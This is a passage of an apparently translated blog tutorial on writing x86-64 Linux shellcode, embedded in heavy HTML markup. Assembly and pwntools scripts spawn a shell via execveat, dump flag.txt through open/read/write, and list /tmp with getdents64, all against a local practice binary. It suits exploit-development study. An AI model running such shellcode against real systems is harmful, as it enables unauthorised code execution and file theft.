string\">\nmov rsi, 0\nmov rdx, 0\nmov rax, 59\nsyscall\n\"\"\"</span></span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">=</span> shellcode\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">with</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"./payload\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"wb\"</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">as</span> f<span class=\"token punctuation\">:</span>\n    f<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Finish exploit</span>\ntarget<span class=\"token punctuation\">.</span>clean<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>This code sends the Shell Code that uses <code class=\"language-text\">execve</code> to get a shell, as created in this section.</p>\n<p>Running it confirms that the following instruction sequence is executed and a shell is launched:</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 779px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/26955300ad2a150642dde554ce1ac88c/96e92/image-20240626202459269.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 61.24999999999999%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAAB60lEQVQoz42TW4+bMBCFedh2E4wBgy+ADUkgaW5NArltFDX//2edDkmkrqrubh8+GXk8R55zjJeMLEIloU0JaehbK1hZQMsMoZFEhTBvaC0gtEalLBzVY6MR9dBenBuqFYiiGF5YZZClQ92sMWrm4JlCIXKoNENQKERFjtDW4HlOAgol1SzBVAqmCUmYFDzV8P0AXqIlut0eXdfhfDojM3SYcyht6JYGzjo4V6IqK4g4wavvY8gYGDUHT9iTICDBrCrQtS1aErxer7DWgscB1DxFMhbIVxmSRkDUMcKCP0SCf8NYf8NM4rDf43DY43b7haIoINMUTVPDugJvbydommIweKUmhoD1+M/1PY89LzIG0+kCzWyB9c+WmmlkMleMyD/ySGuHKLFggSDij+F9nW64Pe1Rjrd4CdcYJN0dk48w+7FELBSGfgSf62dD/AUkeLmdMZ0f8S1uKbULhvJMIVTYbjdYLhcwpk9v8MW4f/CO1yMm0w7fSdBXveAerhyhbXe4XC73kIZD/2H8ByLsXc07XA4YNzu8RBsSO2CY7lC5GtvNFnXdQEpF6bFHip/CHyO7+QqmXCKNHEIxB0tniEv6c+jtWRLmEQny9D+QD8GqnGOiVvT6HZiYIZITaMuRyARCiLt37BPP/uY3u3UqY4I25vcAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/26955300ad2a150642dde554ce1ac88c/8ac56/image-20240626202459269.webp 240w,\n/static/26955300ad2a150642dde554ce1ac88c/d3be9/image-20240626202459269.webp 480w,\n/static/26955300ad2a150642dde554ce1ac88c/82ce4/image-20240626202459269.webp 779w\"\n              sizes=\"(max-width: 779px) 100vw, 779px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/26955300ad2a150642dde554ce1ac88c/8ff5a/image-20240626202459269.png 240w,\n/static/26955300ad2a150642dde554ce1ac88c/e85cb/image-20240626202459269.png 480w,\n/static/26955300ad2a150642dde554ce1ac88c/96e92/image-20240626202459269.png 779w\"\n            sizes=\"(max-width: 779px) 100vw, 779px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/26955300ad2a150642dde554ce1ac88c/96e92/image-20240626202459269.png\"\n            alt=\"image-20240626202459269\"\n            title=\"image-20240626202459269\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"executing-a-program-with-execveat\" style=\"position:relative;\"><a href=\"#executing-a-program-with-execveat\" aria-label=\"executing a program with execveat permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Executing a Program with execveat</h3>\n<p>Let’s create Shell Code that executes a program using <code class=\"language-text\">execveat</code>.</p>\n<p><code class=\"language-text\">execveat</code> takes the path to an executable as its second argument.</p>\n<p>If this path is an absolute path, the first argument <code class=\"language-text\">dirfd</code> is ignored and can be set arbitrarily.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;linux/fcntl.h></span>      <span class=\"token comment\">/* Definition of AT_* constants */</span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;unistd.h></span></span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">execveat</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">int</span> dirfd<span class=\"token punctuation\">,</span> <span class=\"token keyword\">const</span> <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>pathname<span class=\"token punctuation\">,</span>\n            <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span><span class=\"token keyword\">const</span> _Nullable argv<span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n            <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span><span class=\"token keyword\">const</span> _Nullable envp<span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>\n            <span class=\"token keyword\">int</span> flags<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>Reference: <a href=\"https://man7.org/linux/man-pages/man2/execveat.2.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">execveat(2) - Linux manual page</a></p>\n<p>I created the following Shell Code:</p>\n<div class=\"gatsby-highlight\" data-language=\"nasm\"><pre class=\"language-nasm\"><code class=\"language-nasm\">mov <span class=\"token register variable\">rax</span>, <span class=\"token number\">322</span>\nmov <span class=\"token register variable\">rdi</span>, <span class=\"token number\">0</span>\nmov <span class=\"token register variable\">rsi</span>, {binsh_addr}\nmov <span class=\"token register variable\">rdx</span>, <span class=\"token number\">0</span>\nmov <span class=\"token register variable\">r10</span>, <span class=\"token number\">0</span>\nxor <span class=\"token register variable\">r8</span>, <span class=\"token register variable\">r8</span>\nsyscall</code></pre></div>\n<p>Sending this to the test program as Shell Code successfully obtained a shell:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\">shellcode <span class=\"token operator\">=</span> asm<span class=\"token punctuation\">(</span>\n<span class=\"token string-interpolation\"><span class=\"token string\">f\"\"\"mov rax, 322\nmov rdi, 0\nmov rsi, </span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>binsh_addr<span class=\"token punctuation\">}</span></span><span class=\"token string\">\nmov rdx, 0\nmov r10, 0\nxor r8, r8\nsyscall\n\"\"\"</span></span><span class=\"token punctuation\">)</span></code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 745px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/19ce69109759c1f9086e25b4115be66b/7e509/image-20240626204219748.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 35.416666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA/UlEQVQoz6WR23KCMBRFU0AQJF4Y0RpoyAUUHf7/95aBTvtiX9o+7Nn7THLWnJOIY7tH+Qo/KVpfo43B3yZMP9L5ATOMKG3R7hrqG03neG80tu+x1qA7zTD0GNOx2+8Q0VuM6Qzq0rBerwOo5cOdaPSJ6nBgtUpIknhRGnKWrj7z4glxHH+7EGKWwHnLITTPuVCC/CJIK/F14XdK8xTfO6qqQu4LzlbS3LfUWobpUuRWUpYlUkq2Ic9bFEUR6nLxF6DRLY/pwXgfadsmrK7C2zi01pzPJ6wzS+MMLQMkyzLyPGdTbhZ/AfZKYZz9+fAvuoafOtbHZaUoiv4NfAJ69Z77a3O4IwAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/19ce69109759c1f9086e25b4115be66b/8ac56/image-20240626204219748.webp 240w,\n/static/19ce69109759c1f9086e25b4115be66b/d3be9/image-20240626204219748.webp 480w,\n/static/19ce69109759c1f9086e25b4115be66b/06157/image-20240626204219748.webp 745w\"\n              sizes=\"(max-width: 745px) 100vw, 745px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/19ce69109759c1f9086e25b4115be66b/8ff5a/image-20240626204219748.png 240w,\n/static/19ce69109759c1f9086e25b4115be66b/e85cb/image-20240626204219748.png 480w,\n/static/19ce69109759c1f9086e25b4115be66b/7e509/image-20240626204219748.png 745w\"\n            sizes=\"(max-width: 745px) 100vw, 745px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/19ce69109759c1f9086e25b4115be66b/7e509/image-20240626204219748.png\"\n            alt=\"image-20240626204219748\"\n            title=\"image-20240626204219748\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"reading-and-printing-file-contents-with-openreadwrite\" style=\"position:relative;\"><a href=\"#reading-and-printing-file-contents-with-openreadwrite\" aria-label=\"reading and printing file contents with openreadwrite permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Reading and Printing File Contents with open/read/write</h3>\n<p>Next, I’ll implement Shell Code that reads data from a file on the system and returns it to stdout — not executing a program.</p>\n<p>To access file data, first open the file descriptor using <code class=\"language-text\">open</code>.</p>\n<p><code class=\"language-text\">open</code> takes the file path as its first argument.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;fcntl.h></span></span>\n<span class=\"token keyword\">int</span> <span class=\"token function\">open</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">const</span> <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>pathname<span class=\"token punctuation\">,</span> <span class=\"token keyword\">int</span> flags<span class=\"token punctuation\">,</span> <span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span>\n    <span class=\"token comment\">/* mode_t mode */</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>Reference: <a href=\"https://man7.org/linux/man-pages/man2/open.2.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">open(2) - Linux manual page</a></p>\n<p>For example, the following is Shell Code that pushes a hardcoded file name onto the stack and obtains the file descriptor via <code class=\"language-text\">open</code>:</p>\n<div class=\"gatsby-highlight\" data-language=\"nasm\"><pre class=\"language-nasm\"><code class=\"language-nasm\">mov <span class=\"token register variable\">rax</span>, <span class=\"token number\">0x7478742e67616c66</span> <span class=\"token comment\">; flag.txt</span>\npush <span class=\"token number\">0x0</span>\npush <span class=\"token register variable\">rax</span>\nmov <span class=\"token register variable\">rax</span>, <span class=\"token number\">2</span> <span class=\"token comment\">; open</span>\nmov <span class=\"token register variable\">rdi</span>, <span class=\"token register variable\">rsp</span>\nmov <span class=\"token register variable\">rsi</span>, <span class=\"token number\">0</span>\nmov <span class=\"token register variable\">rdx</span>, <span class=\"token number\">0</span>\nsyscall</code></pre></div>\n<p>The file path can also be obtained by other means or pre-loaded onto the stack.</p>\n<p>Remember to insert a NULL byte at the end.</p>\n<p>The file descriptor obtained by this system call is held in RAX.</p>\n<p>Next, use <code class=\"language-text\">read</code> to store the file data in a buffer:</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;unistd.h></span></span>\n<span class=\"token class-name\">ssize_t</span> <span class=\"token function\">read</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">int</span> fd<span class=\"token punctuation\">,</span> <span class=\"token keyword\">void</span> buf<span class=\"token punctuation\">[</span><span class=\"token punctuation\">.</span>count<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token class-name\">size_t</span> count<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>I wrote the following assembly to read file data.</p>\n<p>This code reads 20 bytes from the file descriptor into the stack:</p>\n<div class=\"gatsby-highlight\" data-language=\"nasm\"><pre class=\"language-nasm\"><code class=\"language-nasm\">mov <span class=\"token register variable\">rdi</span>, <span class=\"token register variable\">rax</span> <span class=\"token comment\">; file descriptor as first argument</span>\nmov <span class=\"token register variable\">rax</span>, <span class=\"token number\">0</span> <span class=\"token comment\">; read</span>\nmov <span class=\"token register variable\">rsi</span>, <span class=\"token register variable\">rsp</span> <span class=\"token comment\">; use the stack as the buffer for now</span>\nmov <span class=\"token register variable\">rdx</span>, <span class=\"token number\">20</span>\nsyscall</code></pre></div>\n<p>Reference: <a href=\"https://man7.org/linux/man-pages/man2/read.2.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">read(2) - Linux manual page</a></p>\n<p>Finally, use <code class=\"language-text\">write</code> to return the read string to stdout:</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;unistd.h></span></span>\n<span class=\"token class-name\">ssize_t</span> <span class=\"token function\">write</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">int</span> fd<span class=\"token punctuation\">,</span> <span class=\"token keyword\">const</span> <span class=\"token keyword\">void</span> buf<span class=\"token punctuation\">[</span><span class=\"token punctuation\">.</span>count<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token class-name\">size_t</span> count<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>Use the following assembly code:</p>\n<div class=\"gatsby-highlight\" data-language=\"nasm\"><pre class=\"language-nasm\"><code class=\"language-nasm\">mov <span class=\"token register variable\">rax</span>, <span class=\"token number\">1</span> <span class=\"token comment\">; write</span>\nmov <span class=\"token register variable\">rdi</span>, <span class=\"token number\">1</span> <span class=\"token comment\">; stdin</span>\nmov <span class=\"token register variable\">rsi</span>, <span class=\"token register variable\">rsp</span>\nmov <span class=\"token register variable\">rdx</span>, <span class=\"token number\">20</span>\nsyscall</code></pre></div>\n<p>Reference: <a href=\"https://man7.org/linux/man-pages/man2/write.2.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">write(2) - Linux manual page</a></p>\n<p>The script to send this to the test program is as follows:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\n<span class=\"token comment\"># Set context</span>\ncontext<span class=\"token punctuation\">.</span>arch <span class=\"token operator\">=</span> <span class=\"token string\">\"amd64\"</span>\ncontext<span class=\"token punctuation\">.</span>endian <span class=\"token operator\">=</span> <span class=\"token string\">\"little\"</span>\ncontext<span class=\"token punctuation\">.</span>word_size <span class=\"token operator\">=</span> <span class=\"token number\">64</span>\n\n<span class=\"token comment\"># Set target</span>\nTARGET_PATH <span class=\"token operator\">=</span> <span class=\"token string\">\"./run_shellcode.bin\"</span>\nexe <span class=\"token operator\">=</span> ELF<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">)</span>\ntarget <span class=\"token operator\">=</span> process<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Exploit</span>\nr <span class=\"token operator\">=</span> target<span class=\"token punctuation\">.</span>recvline_startswith<span class=\"token punctuation\">(</span><span class=\"token string\">b\"System:\"</span><span class=\"token punctuation\">)</span>\nsystem_addr <span class=\"token operator\">=</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span>r<span class=\"token punctuation\">.</span>decode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token string\">\" \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span><span class=\"token number\">16</span><span class=\"token punctuation\">)</span>\nr <span class=\"token operator\">=</span> target<span class=\"token punctuation\">.</span>recvline_startswith<span class=\"token punctuation\">(</span><span class=\"token string\">b\"binsh:\"</span><span class=\"token punctuation\">)</span>\nbinsh_addr <span class=\"token operator\">=</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span>r<span class=\"token punctuation\">.</span>decode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token string\">\" \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span><span class=\"token number\">16</span><span class=\"token punctuation\">)</span>\nstack_addr <span class=\"token operator\">=</span> binsh_addr\nfile_name <span class=\"token operator\">=</span> <span class=\"token string\">\"0x\"</span> <span class=\"token operator\">+</span> <span class=\"token string\">\"flag.txt\"</span><span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token string\">\"utf-8\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span><span class=\"token operator\">-</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\nr <span class=\"token operator\">=</span> target<span class=\"token punctuation\">.</span>recvline<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\nshellcode <span class=\"token operator\">=</span> asm<span class=\"token punctuation\">(</span>\n<span class=\"token string-interpolation\"><span class=\"token string\">f\"\"\"mov rax, </span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>file_name<span class=\"token punctuation\">}</span></span><span class=\"token string\">\npush 0x0\npush rax\nmov rax, 2\nmov rdi, rsp\nmov rsi, 0\nmov rdx, 0\nsyscall\n\nmov rdi, rax\nmov rax, 0\nmov rsi, rsp\nmov rdx, 20\nsyscall\n\nmov rax, 1\nmov rdi, 1\nmov rsi, rsp\nmov rdx, 20\nsyscall\n\"\"\"</span></span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">=</span> shellcode\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Finish exploit</span>\ntarget<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>clean<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>Running this script outputs the contents of <code class=\"language-text\">flag.txt</code> via the created Shell Code:</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 782px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/f0f4b283481f2633f91364a19619a9a4/2e195/image-20240626220452807.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 32.08333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA+klEQVQY05WQ226DMBBEDZhAQOXiuiENEGMTEhLaqv//c6dOovah7UseRjsr7R6NRuhdhT3vcOcWO7XMl3fm5dPrAzNO7N1EZ6z3x9v+2hn6wXI4OMxgcM5i7UBRPCGEQAQiZLksqEqTZDHtQdG4HN0UyCi6Hz2iMAzYm94/S8K1YL0VZK0gSMXjsKuKqsCNlmbb+FQ+XacY5h1Kl5RliXpWt1lWJXmek6QJdV1Rq/p/4Hk+cTxNjNdOjGEcR5blja7vvXd+dh5Qo7VGv2gPL25+s9mQZdlf4L5pSNcpQRAQyYg4jomikDC8K/I9SimRsWS1Wv3s3/438AvKT4qpZCWVBAAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/f0f4b283481f2633f91364a19619a9a4/8ac56/image-20240626220452807.webp 240w,\n/static/f0f4b283481f2633f91364a19619a9a4/d3be9/image-20240626220452807.webp 480w,\n/static/f0f4b283481f2633f91364a19619a9a4/c0b7e/image-20240626220452807.webp 782w\"\n              sizes=\"(max-width: 782px) 100vw, 782px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/f0f4b283481f2633f91364a19619a9a4/8ff5a/image-20240626220452807.png 240w,\n/static/f0f4b283481f2633f91364a19619a9a4/e85cb/image-20240626220452807.png 480w,\n/static/f0f4b283481f2633f91364a19619a9a4/2e195/image-20240626220452807.png 782w\"\n            sizes=\"(max-width: 782px) 100vw, 782px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/f0f4b283481f2633f91364a19619a9a4/2e195/image-20240626220452807.png\"\n            alt=\"image-20240626220452807\"\n            title=\"image-20240626220452807\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"browsing-directory-entries-with-getdents\" style=\"position:relative;\"><a href=\"#browsing-directory-entries-with-getdents\" aria-label=\"browsing directory entries with getdents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Browsing Directory Entries with getdents</h3>\n<p>In the previous section I created Shell Code that reads and outputs a file given its path, but when the file name is unknown, we need to enumerate the directory.</p>\n<p>In that case, <code class=\"language-text\">getdents</code> (or <code class=\"language-text\">getdents64</code> on x64) can be used:</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token keyword\">int</span> <span class=\"token function\">getdents</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">unsigned</span> <span class=\"token keyword\">int</span> fd<span class=\"token punctuation\">,</span> <span class=\"token keyword\">struct</span> <span class=\"token class-name\">linux_dirent</span> <span class=\"token operator\">*</span>dirp<span class=\"token punctuation\">,</span>\n             <span class=\"token keyword\">unsigned</span> <span class=\"token keyword\">int</span> count<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>Reference: <a href=\"https://linux.die.net/man/2/getdents64\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">getdents64(2): directory entries - Linux man page</a></p>\n<p><code class=\"language-text\">getdents64</code> can be called using the following Shell Code.</p>\n<p>First, obtain the directory file descriptor using <code class=\"language-text\">open</code>. The exact same code as the previous Shell Code can be used (just change the file path to a directory path).</p>\n<p>Then, issue <code class=\"language-text\">getdents64</code> with the obtained file descriptor as the argument; the results are returned in the specified buffer:</p>\n<div class=\"gatsby-highlight\" data-language=\"nasm\"><pre class=\"language-nasm\"><code class=\"language-nasm\"><span class=\"token comment\">; open dir</span>\nmov <span class=\"token register variable\">rax</span>, {dir_name}\npush <span class=\"token number\">0</span>\npush <span class=\"token register variable\">rax</span>\nmov <span class=\"token register variable\">rax</span>, <span class=\"token number\">2</span> <span class=\"token comment\">; open</span>\nmov <span class=\"token register variable\">rdi</span>, <span class=\"token register variable\">rsp</span>\nmov <span class=\"token register variable\">rsi</span>, <span class=\"token number\">0</span>\nmov <span class=\"token register variable\">rdx</span>, <span class=\"token number\">0</span>\nsyscall\n\n<span class=\"token comment\">; getdents64</span>\nmov <span class=\"token register variable\">rdi</span>, <span class=\"token register variable\">rax</span>\nmov <span class=\"token register variable\">rax</span>, <span class=\"token number\">217</span> <span class=\"token comment\">; getdents64</span>\nmov <span class=\"token register variable\">rsi</span>, <span class=\"token register variable\">rsp</span>\nmov <span class=\"token register variable\">rdx</span>, <span class=\"token number\">300</span>\nsyscall</code></pre></div>\n<p>Use the following code with this Shell Code:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\">dir_name <span class=\"token operator\">=</span> <span class=\"token string\">\"0x\"</span> <span class=\"token operator\">+</span> <span class=\"token string\">\"/tmp/\"</span><span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token string\">\"utf-8\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span><span class=\"token operator\">-</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\nr <span class=\"token operator\">=</span> target<span class=\"token punctuation\">.</span>recvline<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\nshellcode <span class=\"token operator\">=</span> asm<span class=\"token punctuation\">(</span>\n<span class=\"token string-interpolation\"><span class=\"token string\">f\"\"\"mov rax, </span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>dir_name<span class=\"token punctuation\">}</span></span><span class=\"token string\">\npush 0\npush rax\nmov rax, 2\nmov rdi, rsp\nmov rsi, 0\nmov rdx, 0\nsyscall\n\nmov rdi, rax\nmov rax, 217\nmov rsi, rsp\nmov rdx, 300\nsyscall\n\nmov rax, 1\nmov rdi, 1\nmov rsi, rsp\nmov rdx, 300\nsyscall\n\"\"\"</span></span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">=</span> shellcode\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span></code></pre></div>\n<p>Running this successfully retrieves the names of files and directories under <code class=\"language-text\">/tmp</code>:</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 915px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/8b78c6b7e6d4f582ad12f45f3bc93042/4255a/image-20240627012031364.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 42.083333333333336%; position: relative; 